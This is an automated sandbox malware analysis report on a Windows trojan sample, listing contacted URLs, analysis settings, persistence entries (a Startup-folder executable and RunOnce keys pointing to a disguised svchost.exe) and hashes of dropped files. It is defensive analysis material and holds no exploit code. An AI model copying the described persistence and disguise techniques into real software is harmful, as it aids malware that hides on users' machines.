                                                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.founder.com.cn/cnVknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000003.247622790.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yVknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.sajatypeworks.comntVknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.commVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.jiyu-kobo.co.jp/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.com/designers8VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://activity.windows.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		low

                                                                                                                  Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  192.168.2.1
                                                                                                                  127.0.0.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                  Analysis ID:483863
                                                                                                                  Start date:15.09.2021
                                                                                                                  Start time:15:19:29
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 16m 6s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Sample file name:VknMvPoCXZ (renamed file extension from none to exe)
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                  Number of analysed new started processes analysed:83
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.adwa.expl.evad.winEXE@113/58@0/2
                                                                                                                  EGA Information:Failed
                                                                                                                  HDC Information:
                                                                                                                  • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                  • Quality average: 83%
                                                                                                                  • Quality standard deviation: 25.9%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 89%
                                                                                                                  • Number of executed functions: 80
                                                                                                                  • Number of non-executed functions: 173
                                                                                                                  Cookbook Comments:
                                                                                                                  • Adjust boot time
                                                                                                                  • Enable AMSI
                                                                                                                  Warnings:
                                                                                                                  Show All
                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 93.184.220.29, 20.199.120.85, 20.82.209.183, 20.189.173.21, 20.199.120.151, 20.199.120.182, 20.189.173.22, 20.42.73.29, 52.182.143.212, 52.168.117.173
                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, cs9.wac.phicdn.net, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  15:20:34API Interceptor4x Sleep call for process: svchost.exe modified
                                                                                                                  15:20:35API Interceptor1x Sleep call for process: VknMvPoCXZ.exe modified
                                                                                                                  15:20:50API Interceptor377x Sleep call for process: powershell.exe modified
                                                                                                                  15:20:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  15:21:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
                                                                                                                  15:21:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe
                                                                                                                  15:21:22API Interceptor2x Sleep call for process: 481F404B.exe modified
                                                                                                                  15:21:33API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                  15:21:51API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                  15:21:55API Interceptor137x Sleep call for process: aspnet_compiler.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASN

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4096
                                                                                                                  Entropy (8bit):0.597889115294713
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:0FgLgk1GaD0JOCEfMuaaD0JOCEfMKQmDd+JtAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0APGaD0JcaaD0JwQQdmtAg/0bjSQJ
                                                                                                                  MD5:9AE4A5B8574F3175E725DF00EF2BCCCC
                                                                                                                  SHA1:52BD0FFA1BD5ED0F9C952EE1FCFA2A206FF596D4
                                                                                                                  SHA-256:80802285C72FB0CE935A0E6596C341CEE5928BDB4220240CF93932E384BE1BCD
                                                                                                                  SHA-512:A35AB50A730391A5E6D3D7D0D0DF198EC7C97FF5C91994996EB4F924EECE67D2D39081317DB19D195C6583D224480CCC6BC66FB5BDD61D5E5498CA6C1DF90A34
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ......:{..(....."....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................."....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x17166b1a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32768
                                                                                                                  Entropy (8bit):0.09472530939958232
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Mzwl/+U90HsRIE11Y8TRXo8asHXqKSzwl/+U90HsRIE11Y8TRXo8asHXqK:M0+UWMO4bl+sH6KS0+UWMO4bl+sH6K
                                                                                                                  MD5:9CFDA737FCE78F047B1C6B9F28FE6BB4
                                                                                                                  SHA1:D87C7A73033D63F0C64EAD4A5B1E65A505263BEF
                                                                                                                  SHA-256:B46F1E6F00B194E503BA0AB82A80CE3AF9CB3392CCB7AE76B65BCEE5B65726CC
                                                                                                                  SHA-512:9E719990FED79A33B3C2BABF3D2A213536762DC3509803FCB6932558ADEE2D9A7D0C65F44E441D034FBE8F2B0C04357D434EEE7F8131A5B2C640946D88AC99DC
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ..k.... ................e.f.3...w........................&..........w..#....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................D..G#....y..................b...#....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8192
                                                                                                                  Entropy (8bit):0.10885277311932687
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:cKll9EvG1XFkl7l/bJdAtiX///all:c+lYG11kl7t4IXG
                                                                                                                  MD5:18BC9A7B14851DC930A11663A65F23DE
                                                                                                                  SHA1:F8F5D5964D1495CB1A95E0C056DAD18AC5690709
                                                                                                                  SHA-256:D43DC4F6F56B808BEBD1F473F890D6DDEAF4EC3D000368E45E3F40A69B411FE4
                                                                                                                  SHA-512:BDFF1533834048D08BC95718B70628FBB08B45190C3FA299E24F9F7B837C8F646D03BA4D87CDFE211CD15640141E263FA92BDE75F6C3C9D6A9C49C6D571D21BC
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: DQ.......................................3...w..#....y.......w...............w.......w....:O.....w..................b...#....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VknMvPoCXZ.exe_64eaf576c345d5342863ccd8192529db1bd52c80_e2466c59_0f48ed99\Report.wer
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16762
                                                                                                                  Entropy (8bit):3.7630351978974383
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:uW+eN7erHigKnaKeCiAKmYNetK/u7scS274ItWc0:x+eN7KigKnaHCK/u7scX4ItWH
                                                                                                                  MD5:56DEE45DDDD24DA9F5C50B4938CCCA83
                                                                                                                  SHA1:0A5776C80B3B30621DFE9E0861E6215ED9ECC5F9
                                                                                                                  SHA-256:D024A71478BE90E3FAA55C365B2BB9BDDCF153B121D869B6DB68004FFEF47653
                                                                                                                  SHA-512:7AC3B35511B2D91F3279F01DEC6C7B9C1FF1D88323F50E30F3DD80A76F04D65F25041C97B85D6586C7D1711020B05EBEDF7D966D6AF035E1247AA370669C48B0
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.8.0.8.3.5.7.5.8.0.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.8.0.9.1.4.6.6.4.2.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.5.6.3.5.7.a.-.5.4.3.6.-.4.c.f.7.-.b.f.e.6.-.1.1.3.1.a.c.7.a.0.b.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.c.b.1.4.7.a.-.f.1.8.f.-.4.a.d.9.-.b.0.2.a.-.f.4.d.7.5.8.1.0.6.b.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.k.n.M.v.P.o.C.X.Z...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...V.i.s.u.a.l.S.t.u.d.i.o...D.e.v.O.p.s...T.e.l.e.m.e.t.r.y...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.4.-.0.0.0.1.-.0.0.1.6.-.0.5.a.3.-.3.8.e.2.7.f.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.8.5.c.3.8.c.5.4.b.0.c.b.4.7.3.d.2.e.1.4.5.f.0.8.a.5.c.e.5.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.d.e.4.d.d.
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC744.tmp.dmp
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 22:21:25 2021, 0x1205a4 type
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):379871
                                                                                                                  Entropy (8bit):4.1539889535685806
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:5rbJyOk9gIOgF5c50GfSUCgUNrvoDDMeBBRAMoXnmGH+fak3b20Pjd+pr90Mt:5JyD9RpD+YTj0buMq5+Db20IpH
                                                                                                                  MD5:A92EFD02DB32AE17F78DE3FD09CE5CE6
                                                                                                                  SHA1:1F2122F65414870C23C52873D1C3140E70198C14
                                                                                                                  SHA-256:A91332A2E8F3ADB08FFBBCDB60109CA458149EC57E7C11D4549C10D44666D49C
                                                                                                                  SHA-512:07D1B6F5E97760D4BDC5CD15952C16226BF268A6B7680CCC2C5E1D1E6BB40F4D05A87E5A4A06F420682B8112384124DB1D5CA8EC5DC51204D4C916DD05454B7C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MDMP....... ........qBa...................U...........B.......,......GenuineIntelW...........T............qBa.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA60.tmp.WERInternalMetadata.xml
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8422
                                                                                                                  Entropy (8bit):3.698682703520275
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Rrl7r3GLNiH86k6YIMSULMYegmfZfSKaCprD89bnNsfENm:RrlsNic6k6YjSULMYegmfxSKWnGfD
                                                                                                                  MD5:DDF24E91AC42E380463C5B998CDAF1FB
                                                                                                                  SHA1:00F83BCEA6D49CEA8A76371CAA540D21B57E98E9
                                                                                                                  SHA-256:56E7DD32B70B9A1DFFFB9C0CCCC0EE9CA96C3A9559F291A16215CD2A17C4AFCD
                                                                                                                  SHA-512:FD40E7099C360EF29774AE3006E3E2F9272DFC6EC27E7A2A30965D31493AFA0A4383ED684074506C46268D043457DA864962CD0CC048E308BF06258A3EA01117
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.4.<./.P.i.d.>.......
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC26.tmp.xml
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4788
                                                                                                                  Entropy (8bit):4.498039358519405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:cvIwSD8zs/JgtWI9IGWSC8BgM8fm8M4JeHOVQ1FX+q8vMOVQ9MJd7Y0rhy002Qd:uITfhvHSNsJD4KNVv1rd0Hd
                                                                                                                  MD5:9F0F8A48808420FC92684FB96C2B2C58
                                                                                                                  SHA1:1F92A2A8387E9571C94611877F2843E0433E9CB2
                                                                                                                  SHA-256:703502C9BF6DDB6CC27D2E79C5274D30E6754F91E488FAF649E2A797EE2E950E
                                                                                                                  SHA-512:758A364395405757FCE88E62E2740883DA68B3957B71FE111A8134273CF90CE96B6B7266D04B4564B9DBE87242CE3503B07B47AC9D795FAE25E491F986E0B729
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168292" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC53.tmp.csv
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):54636
                                                                                                                  Entropy (8bit):3.073026398744777
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:QshHfvCPrkT6a227idJ4dPGYnVoBHKjv8QB604kZh:QshHfvCPrkT6a227idJ4dPGYnVUHKjv3
                                                                                                                  MD5:11787EC20E9E1501D0C0DA787B1EEF07
                                                                                                                  SHA1:F9FB5015673B24B0F13BD914C0ECED8A0236239B
                                                                                                                  SHA-256:448CEFD0E0ADF340D53244B813693DFA017B0A831570530B211B413794787A55
                                                                                                                  SHA-512:03FD4B185EED29A019B98C75D3986BDABA776F4E4F965A4B0B47FE94F03CAFEBF7882A0E2B96001158C78691626E388BF794755DACF09D1396436E20AC0813F5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE424.tmp.txt
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):13340
                                                                                                                  Entropy (8bit):2.6963291623570638
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:9GiZYWgSVDwGFhYGYjZWVx6HaUYEZMJtribjZJiwwqAAla8Xc843tIv73:9jZDg0zBBxNF+a8Xc84iv73
                                                                                                                  MD5:124B52EE4688EF5F20BDB5636985282E
                                                                                                                  SHA1:4F4FBB4016164AFCB12847E675FD0EC14612F379
                                                                                                                  SHA-256:850300B2AFBC3D7AD0D7071BE1DE9EDDEB810A49E1693CCB29D43F985CF8562F
                                                                                                                  SHA-512:6865D19FC4BC00413CF5F97B3203D963DE6A504E61AB22E20C0665F94D182B0FDC070DA50882F4AFE0B1D0BA54E22FA42F8D97F7E451C98AEF6EB108553FF8FA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14734
                                                                                                                  Entropy (8bit):4.993014478972177
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                                  MD5:8D5E194411E038C060288366D6766D3D
                                                                                                                  SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                                  SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                                  SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
